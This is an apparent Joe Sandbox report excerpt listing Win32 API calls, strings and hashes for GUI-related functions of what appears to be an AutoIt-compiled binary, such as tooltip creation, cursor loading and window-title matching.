GetSysColorBrush.USER32(0000000F), ref: 00F1A91D
GetSysColor.USER32(0000000F), ref: 00F1A928
CreateSolidBrush.GDI32(?), ref: 00F1A92D
GetSysColor.USER32(00000011), ref: 00F1A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F1A953
SelectObject.GDI32(?,00000000), ref: 00F1A964
SetBkColor.GDI32(?,00000000), ref: 00F1A96D
SelectObject.GDI32(?,?), ref: 00F1A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00F1A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F1A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F1A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F1A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F1AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00F1AA32
DrawFocusRect.USER32(?,?), ref: 00F1AA3D
GetSysColor.USER32(00000011), ref: 00F1AA4B
SetTextColor.GDI32(?,00000000), ref: 00F1AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F1AA67
SelectObject.GDI32(?,00F1A5FA), ref: 00F1AA7E
DeleteObject.GDI32(?), ref: 00F1AA89
SelectObject.GDI32(?,?), ref: 00F1AA8F
DeleteObject.GDI32(?), ref: 00F1AA94
SetTextColor.GDI32(?,?), ref: 00F1AA9A
SetBkColor.GDI32(?,?), ref: 00F1AAA4

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: cfb008ee93987f7bd5f517bfae8678c0e0160e789e881f5861c5b7ce6d8161c2
Instruction ID: 35e4f32b4281a8a0c274dbb78d26352a0e5857ae59081698462e7e9a708774d2
Opcode Fuzzy Hash: cfb008ee93987f7bd5f517bfae8678c0e0160e789e881f5861c5b7ce6d8161c2
Instruction Fuzzy Hash: B5513D71901208FFDB119FA4DC48EEE7BB9EF08320F168225F915AB2A1D7759944EF90

Function 00F189D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F18AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F18AD2
CharNextW.USER32(0000014E), ref: 00F18B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F18B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F18B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F18B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F18B86
SetWindowTextW.USER32(?,0000014E), ref: 00F18BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F18BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F18C1F
_memset.LIBCMT ref: 00F18C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F18C8D
_memset.LIBCMT ref: 00F18CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F18D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00F18D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00F18E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00F18E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F18E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F18EB4
DrawMenuBar.USER32(?), ref: 00F18EC3
SetWindowTextW.USER32(?,0000014E), ref: 00F18EEB

Strings

0, xrefs: 00F18E55

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 2f3fe9389e710f4b2ca9e622f0e87971818cf8a1d60eda584783e6c0fe4f06fb
Instruction ID: 47998d31a0480712359c8bb418b167371318ea845f41bf01036007c534e8c0ff
Opcode Fuzzy Hash: 2f3fe9389e710f4b2ca9e622f0e87971818cf8a1d60eda584783e6c0fe4f06fb
Instruction Fuzzy Hash: F1E19171900208AFDF20DF51CD84EEE7BB9EF09760F10815AF915AA290DB7589C6EF60

Function 00F1488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F149CA
GetDesktopWindow.USER32 ref: 00F149DF
GetWindowRect.USER32(00000000), ref: 00F149E6
GetWindowLongW.USER32(?,000000F0), ref: 00F14A48
DestroyWindow.USER32(?), ref: 00F14A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F14A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F14ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F14AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00F14AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F14B09
IsWindowVisible.USER32(?), ref: 00F14B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F14B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F14B58
GetWindowRect.USER32(?,?), ref: 00F14B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00F14B96
GetMonitorInfoW.USER32(00000000,?), ref: 00F14BB0
CopyRect.USER32(?,?), ref: 00F14BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00F14C32

Strings

tooltips_class32, xrefs: 00F14A96
(, xrefs: 00F14BA3
0, xrefs: 00F14975

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: dec776343a677dcb5392c8023a8c23ff1c42bbf4158847c1acae4a89903c2c7a
Instruction ID: c00cc67fca1e0f8d6719b17d2a2efa056b9ab5d336077a1f1aa98279610bf8b8
Opcode Fuzzy Hash: dec776343a677dcb5392c8023a8c23ff1c42bbf4158847c1acae4a89903c2c7a
Instruction Fuzzy Hash: 68B1AD71608340AFDB04DF68C845BAABBE4FF88710F00891CF999AB2A1D775EC45DB95

Function 00EF449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00EF44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00EF44D2
_wcscpy.LIBCMT ref: 00EF4500
_wcscmp.LIBCMT ref: 00EF450B
_wcscat.LIBCMT ref: 00EF4521
_wcsstr.LIBCMT ref: 00EF452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EF4548
_wcscat.LIBCMT ref: 00EF4591
_wcscat.LIBCMT ref: 00EF4598
_wcsncpy.LIBCMT ref: 00EF45C3

Strings

StringFileInfo\, xrefs: 00EF451B
%u.%u.%u.%u, xrefs: 00EF4626
\VarFileInfo\Translation, xrefs: 00EF4540
04090000, xrefs: 00EF457E
DefaultLangCodepage, xrefs: 00EF45AB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 41aba00f8da31ed70c11c5aa729e0deabd0b8ca676e585afbc56b489fb795dd9
Instruction ID: dcdb26e9984edfb0eb0486b58fc9cea3e749161f85210a03b37d5e3fb4e129a5
Opcode Fuzzy Hash: 41aba00f8da31ed70c11c5aa729e0deabd0b8ca676e585afbc56b489fb795dd9
Instruction Fuzzy Hash: 3041C171A402047BDB11BA748C47EFF77ACDF46750F04116AFA05F61C2EA34EA01A6AA

Function 00E927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E928BC
GetSystemMetrics.USER32(00000007), ref: 00E928C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E928EF
GetSystemMetrics.USER32(00000008), ref: 00E928F7
GetSystemMetrics.USER32(00000004), ref: 00E9291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E92939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E92949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E9297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E92990
GetClientRect.USER32(00000000,000000FF), ref: 00E929AE
GetStockObject.GDI32(00000011), ref: 00E929CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E929D5

Part of subcall function 00E92344: GetCursorPos.USER32(?), ref: 00E92357
Part of subcall function 00E92344: ScreenToClient.USER32(00F557B0,?), ref: 00E92374
Part of subcall function 00E92344: GetAsyncKeyState.USER32(00000001), ref: 00E92399
Part of subcall function 00E92344: GetAsyncKeyState.USER32(00000002), ref: 00E923A7

SetTimer.USER32(00000000,00000000,00000028,00E91256), ref: 00E929FC

Strings

AutoIt v3 GUI, xrefs: 00E92974

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 02b0a7e98b5d54acf5891d2b9f2e14d701326318571723576c7a3b4220152a22
Instruction ID: c4d811b15cd0813dc9245f0a0485f89d1e8fed7e1ce2da384326f41bd5b3520c
Opcode Fuzzy Hash: 02b0a7e98b5d54acf5891d2b9f2e14d701326318571723576c7a3b4220152a22
Instruction Fuzzy Hash: E6B19C71A0020AEFDF14DFA8DC55BEE7BB4FB08715F109229FA15A72A0DB74A841DB50

Function 00EEA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00EEA47A
__swprintf.LIBCMT ref: 00EEA51B
_wcscmp.LIBCMT ref: 00EEA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EEA583
_wcscmp.LIBCMT ref: 00EEA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00EEA5F6
GetDlgCtrlID.USER32(?), ref: 00EEA648
GetWindowRect.USER32(?,?), ref: 00EEA67E
GetParent.USER32(?), ref: 00EEA69C
ScreenToClient.USER32(00000000), ref: 00EEA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00EEA71D
_wcscmp.LIBCMT ref: 00EEA731
GetWindowTextW.USER32(?,?,00000400), ref: 00EEA757
_wcscmp.LIBCMT ref: 00EEA76B

Part of subcall function 00EB362C: _iswctype.LIBCMT ref: 00EB3634

Strings

%s%u, xrefs: 00EEA515

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: d65661d1e47a1f3f789d58e447e8394179d9cf76743c5b275f2a8ffdc7db9329
Instruction ID: 08b0f2d5a5488857114db92f8a0e03fc86a4437c50f1b82564f5d22a65855a1f
Opcode Fuzzy Hash: d65661d1e47a1f3f789d58e447e8394179d9cf76743c5b275f2a8ffdc7db9329
Instruction Fuzzy Hash: E7A1B37120424AAFD714DF61C884BEAB7E8FF44318F08952EF999E2190D730F959CB92

Function 00EEAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00EEAF18
_wcscmp.LIBCMT ref: 00EEAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00EEAF51
CharUpperBuffW.USER32(?,00000000), ref: 00EEAF6E
_wcscmp.LIBCMT ref: 00EEAF8C
_wcsstr.LIBCMT ref: 00EEAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00EEAFD5
_wcscmp.LIBCMT ref: 00EEAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00EEB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00EEB055
_wcscmp.LIBCMT ref: 00EEB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00EEB08D
GetWindowRect.USER32(00000004,?), ref: 00EEB0F6

Strings

@, xrefs: 00EEAEF9
ThumbnailClass, xrefs: 00EEAFE0, 00EEB060

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: c6b86f36a5cb157761c3968edcad723ec366e88395c7a12cd2d9be7ede57516f
Instruction ID: 1fd673a29875339912dc19fb13f275688b0511ab4d99a4558c145181d458f57f
Opcode Fuzzy Hash: c6b86f36a5cb157761c3968edcad723ec366e88395c7a12cd2d9be7ede57516f
Instruction Fuzzy Hash: FE81A1711083499FDB15DF12C881BAB7BD8EF84318F08A46DFD85AA095DB30ED49CBA1

Function 00EEABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00EEAC33

Strings

LAST, xrefs: 00EEABF8
[REGEXPTITLE:, xrefs: 00EEAC5B
[ALL, xrefs: 00EEACD9
[HANDLE:, xrefs: 00EEAC3F
ACTIVE, xrefs: 00EEAC0E
REGEXP=, xrefs: 00EEAC48
[LAST, xrefs: 00EEACE0
[CLASS:, xrefs: 00EEAC83
[ACTIVE, xrefs: 00EEAC20
CLASSNAME=, xrefs: 00EEAC70
HANDLE=, xrefs: 00EEAC2C
ALL, xrefs: 00EEACC7

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 76a60caa1e9d1e66bb68a87d56e3f59e918191493ddf05dc5c339407dc11eac2
Instruction ID: 34dc26a5a0fd415cee19a47612863ae408b2a38e3f2dfc160ed48a702187242c
Opcode Fuzzy Hash: 76a60caa1e9d1e66bb68a87d56e3f59e918191493ddf05dc5c339407dc11eac2
Instruction Fuzzy Hash: 2D31B031A48349AADA10FA61DE03EEEBBE5AF10714F642429B842710E1EF55AF089653

Function 00F04FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00F05013
LoadCursorW.USER32(00000000,00007F00), ref: 00F0501E
LoadCursorW.USER32(00000000,00007F03), ref: 00F05029
LoadCursorW.USER32(00000000,00007F8B), ref: 00F05034
LoadCursorW.USER32(00000000,00007F01), ref: 00F0503F
LoadCursorW.USER32(00000000,00007F81), ref: 00F0504A
LoadCursorW.USER32(00000000,00007F88), ref: 00F05055
LoadCursorW.USER32(00000000,00007F80), ref: 00F05060
LoadCursorW.USER32(00000000,00007F86), ref: 00F0506B
LoadCursorW.USER32(00000000,00007F83), ref: 00F05076
LoadCursorW.USER32(00000000,00007F85), ref: 00F05081
LoadCursorW.USER32(00000000,00007F82), ref: 00F0508C
LoadCursorW.USER32(00000000,00007F84), ref: 00F05097
LoadCursorW.USER32(00000000,00007F04), ref: 00F050A2
LoadCursorW.USER32(00000000,00007F02), ref: 00F050AD
LoadCursorW.USER32(00000000,00007F89), ref: 00F050B8
GetCursorInfo.USER32(?), ref: 00F050C8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: b70961312c6f9460331bfa4adfc2d3c6755de3582a7c343aa27a5ca41a38db0a
Instruction ID: 532ab83dacf3f63f8d260ca4e3d69c2447cd5eb329c85aa51d6f3d4b0225c0c4
Opcode Fuzzy Hash: b70961312c6f9460331bfa4adfc2d3c6755de3582a7c343aa27a5ca41a38db0a
Instruction Fuzzy Hash: 283105B1D4831E6ADF109FB68C8999FBFE8FF04750F50452AA50DE7280DA78A5009F95

Function 00F1A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1A259
DestroyWindow.USER32(?,?), ref: 00F1A2D3

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F1A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F1A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F1A382
DestroyWindow.USER32(00000000), ref: 00F1A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E90000,00000000), ref: 00F1A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F1A3F4
GetDesktopWindow.USER32 ref: 00F1A40D
GetWindowRect.USER32(00000000), ref: 00F1A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F1A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F1A444

Part of subcall function 00E925DB: GetWindowLongW.USER32(?,000000EB), ref: 00E925EC

Strings

tooltips_class32, xrefs: 00F1A346, 00F1A3D4
0, xrefs: 00F1A26F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 43dccef6acd08093a03d50e1d54156bbc8996cbf1a7e5e5951d3d559855523cc
Instruction ID: 5833d62d64b131eb054225344e73162b06eb961b899ff301d9105ce9dc539d73
Opcode Fuzzy Hash: 43dccef6acd08093a03d50e1d54156bbc8996cbf1a7e5e5951d3d559855523cc
Instruction Fuzzy Hash: 69719B71540308AFDB25CF28CC49FAA7BE6FB88710F04452CF9859B2A1D771E946EB52

Function 00F1C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

DragQueryPoint.SHELL32(?,?), ref: 00F1C627

Part of subcall function 00F1AB37: ClientToScreen.USER32(?,?), ref: 00F1AB60
Part of subcall function 00F1AB37: GetWindowRect.USER32(?,?), ref: 00F1ABD6
Part of subcall function 00F1AB37: PtInRect.USER32(?,?,00F1C014), ref: 00F1ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00F1C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F1C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F1C6BE
_wcscat.LIBCMT ref: 00F1C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F1C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00F1C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00F1C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00F1C757
DragFinish.SHELL32(?), ref: 00F1C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F1C851

Strings

@GUI_DRAGFILE, xrefs: 00F1C800
@GUI_DROPID, xrefs: 00F1C77E
@GUI_DRAGID, xrefs: 00F1C7C9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: bc4a28913fd62a6fa568c35eccb754f9e5d23982311e6ce67e3ed84d39bdbf58
Instruction ID: cb941cc1a976e201ce1e2ce5eceb8063f16fe94f865a817af607393570799e10
Opcode Fuzzy Hash: bc4a28913fd62a6fa568c35eccb754f9e5d23982311e6ce67e3ed84d39bdbf58
Instruction Fuzzy Hash: BA618E71108305AFCB01EF64DC85DAFBBE8FF89750F00492EF695921A1DB70A949DB92

Function 00F14392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F14424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F1446F

Strings

CHECK, xrefs: 00F1448F
GETTEXT, xrefs: 00F145C2
EXPAND, xrefs: 00F14521
GETITEMCOUNT, xrefs: 00F14551
COLLAPSE, xrefs: 00F144B5
GETSELECTED, xrefs: 00F1457F
UNCHECK, xrefs: 00F1464B
SELECT, xrefs: 00F14620
ISCHECKED, xrefs: 00F145F2
GETTOTALCOUNT, xrefs: 00F14456
EXISTS, xrefs: 00F144D8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharMessageSendUpper
